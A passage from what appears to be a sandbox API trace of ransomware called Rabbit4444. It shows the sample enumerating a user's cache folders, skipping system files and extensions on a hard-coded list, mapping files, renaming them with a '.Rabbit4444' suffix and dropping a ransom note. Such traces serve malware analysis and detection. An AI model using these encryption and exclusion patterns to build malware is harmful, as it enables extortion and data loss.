0x109140 [0068.704] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0068.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0068.704] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16001466163) returned 1 [0068.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0068.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0068.704] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.704] CloseHandle (hObject=0x29c) returned 1 [0068.704] CloseHandle (hObject=0x280) returned 1 [0068.704] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506.Rabbit4444") returned 161 [0068.704] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\metadata\\77ec63bda74bd0d0e0426dc8f8008506"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\metadata\\77ec63bda74bd0d0e0426dc8f8008506.rabbit4444"), dwFlags=0x1) returned 1 [0068.705] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc48a21eb, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc48a21eb, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 1 [0068.705] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.705] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.705] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="Rabbit4444.exe") returned -1 [0068.705] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2=".") returned 1 [0068.705] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="..") returned 1 [0068.705] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="windows") returned -1 [0068.705] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="bootmgr") returned 1 [0068.705] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="pagefile.sys") returned -1 [0068.705] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="boot") returned 1 [0068.705] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="ids.txt") returned -1 [0068.705] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="NTUSER.DAT") returned -1 [0068.705] lstrcpyW (in: lpString1=0x130ec24, lpString2="FB0D848F74F70BB2EAA93746D24D9749" | out: lpString1="FB0D848F74F70BB2EAA93746D24D9749") returned="FB0D848F74F70BB2EAA93746D24D9749" [0068.705] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749", dwFileAttributes=0x2020) returned 1 [0068.706] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749", dwFileAttributes=0x2004) returned 1 [0068.706] lstrlenW (lpString="FB0D848F74F70BB2EAA93746D24D9749") returned 32 [0068.706] lstrlenW (lpString="Rabbit4444") returned 10 [0068.706] lstrcmpiW (lpString1="46D24D9749", lpString2="Rabbit4444") returned -1 [0068.706] lstrlenW (lpString=".dll") returned 4 [0068.706] lstrcmpiW (lpString1="9749", lpString2=".dll") returned 1 [0068.706] lstrlenW (lpString=".lnk") returned 4 [0068.706] lstrcmpiW (lpString1="9749", lpString2=".lnk") returned 1 [0068.706] lstrlenW (lpString=".ini") returned 4 [0068.706] lstrcmpiW (lpString1="9749", lpString2=".ini") returned 1 [0068.706] lstrlenW (lpString=".sys") returned 4 [0068.706] lstrcmpiW (lpString1="9749", lpString2=".sys") returned 1 [0068.706] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\metadata\\fb0d848f74f70bb2eaa93746d24d9749"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.706] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.707] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16001730047) returned 1 [0068.707] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=290) returned 1 [0068.707] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0068.707] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0068.707] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x430, lpName=0x0) returned 0x29c [0068.711] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x430) returned 0x70000 [0068.711] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e1e8 [0068.711] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0068.711] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.712] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0068.712] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.712] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0068.712] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.712] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0068.712] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16002267632) returned 1 [0068.712] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0068.712] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0068.712] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.712] CloseHandle (hObject=0x29c) returned 1 [0068.712] CloseHandle (hObject=0x280) returned 1 [0068.712] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749.Rabbit4444") returned 161 [0068.712] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\metadata\\fb0d848f74f70bb2eaa93746d24d9749"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\metadata\\fb0d848f74f70bb2eaa93746d24d9749.rabbit4444"), dwFlags=0x1) returned 1 [0068.713] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc48a21eb, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc48a21eb, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 0 [0068.713] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0068.713] lstrcpyW (in: lpString1=0x130ec24, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.713] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\MetaData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\metadata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.714] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0068.715] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.715] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.715] CloseHandle (hObject=0x280) returned 1 [0068.715] CloseHandle (hObject=0x228) returned 1 [0068.715] GetCurrentThreadId () returned 0xd98 [0068.715] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0068.715] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content" [0068.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11fc40 | out: hHeap=0xe0000) returned 1 [0068.715] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0068.715] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content" [0068.715] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\" [0068.715] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\.BFC0E91B00AE8A0620D3" [0068.715] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\content\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.718] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.720] FlushFileBuffers (hFile=0x228) returned 1 [0068.721] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.722] CloseHandle (hObject=0x228) returned 1 [0068.722] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content") returned 116 [0068.722] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.722] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc487bf98, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf248bc1d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0068.722] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.722] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.722] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.722] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.722] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc487bf98, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf248bc1d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.722] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.722] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.722] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.722] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.723] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.723] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf248bc1d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf248bc1d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf248bc1d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.723] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.723] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.723] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc48a21eb, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc48a21eb, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc48a21eb, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0068.723] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.723] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.723] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="Rabbit4444.exe") returned -1 [0068.723] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2=".") returned 1 [0068.723] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="..") returned 1 [0068.723] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="windows") returned -1 [0068.723] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="bootmgr") returned -1 [0068.723] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="pagefile.sys") returned -1 [0068.723] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="boot") returned -1 [0068.723] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="ids.txt") returned -1 [0068.723] lstrcmpiW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="NTUSER.DAT") returned -1 [0068.723] lstrcpyW (in: lpString1=0x130ec22, lpString2="57C8EDB95DF3F0AD4EE2DC2B8CFD4157" | out: lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="57C8EDB95DF3F0AD4EE2DC2B8CFD4157" [0068.723] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", dwFileAttributes=0x2020) returned 1 [0068.723] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157", dwFileAttributes=0x2004) returned 1 [0068.723] lstrlenW (lpString="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned 32 [0068.723] lstrlenW (lpString="Rabbit4444") returned 10 [0068.723] lstrcmpiW (lpString1="2B8CFD4157", lpString2="Rabbit4444") returned -1 [0068.723] lstrlenW (lpString=".dll") returned 4 [0068.723] lstrcmpiW (lpString1="4157", lpString2=".dll") returned 1 [0068.724] lstrlenW (lpString=".lnk") returned 4 [0068.724] lstrcmpiW (lpString1="4157", lpString2=".lnk") returned 1 [0068.724] lstrlenW (lpString=".ini") returned 4 [0068.724] lstrcmpiW (lpString1="4157", lpString2=".ini") returned 1 [0068.724] lstrlenW (lpString=".sys") returned 4 [0068.724] lstrcmpiW (lpString1="4157", lpString2=".sys") returned 1 [0068.724] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc487bf98, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc487bf98, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc487bf98, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", cAlternateFileName="6BADA8~1")) returned 1 [0068.724] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.724] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.724] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="Rabbit4444.exe") returned -1 [0068.724] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2=".") returned 1 [0068.724] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="..") returned 1 [0068.724] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="windows") returned -1 [0068.724] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="bootmgr") returned -1 [0068.724] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="pagefile.sys") returned -1 [0068.724] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="boot") returned -1 [0068.724] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="ids.txt") returned -1 [0068.724] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", lpString2="NTUSER.DAT") returned -1 [0068.724] lstrcpyW (in: lpString1=0x130ec22, lpString2="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" | out: lpString1="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04") returned="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" [0068.724] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", dwFileAttributes=0x2020) returned 1 [0068.724] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04", dwFileAttributes=0x2004) returned 1 [0068.724] lstrlenW (lpString="6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04") returned 65 [0068.724] lstrlenW (lpString="Rabbit4444") returned 10 [0068.725] lstrcmpiW (lpString1="4792417E04", lpString2="Rabbit4444") returned -1 [0068.725] lstrlenW (lpString=".dll") returned 4 [0068.725] lstrcmpiW (lpString1="7E04", lpString2=".dll") returned 1 [0068.725] lstrlenW (lpString=".lnk") returned 4 [0068.725] lstrcmpiW (lpString1="7E04", lpString2=".lnk") returned 1 [0068.725] lstrlenW (lpString=".ini") returned 4 [0068.725] lstrcmpiW (lpString1="7E04", lpString2=".ini") returned 1 [0068.725] lstrlenW (lpString=".sys") returned 4 [0068.725] lstrcmpiW (lpString1="7E04", lpString2=".sys") returned 1 [0068.725] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_BEB37ABADF39714871232B4792417E04" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\cryptneturlcache\\content\\6bada8974a10c4bd62cc921d13e43b18_beb37abadf39714871232b4792417e04"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.725] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.725] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16003593219) returned 1 [0068.725] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=471) returned 1 [0068.725] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0068.725] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0068.725] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 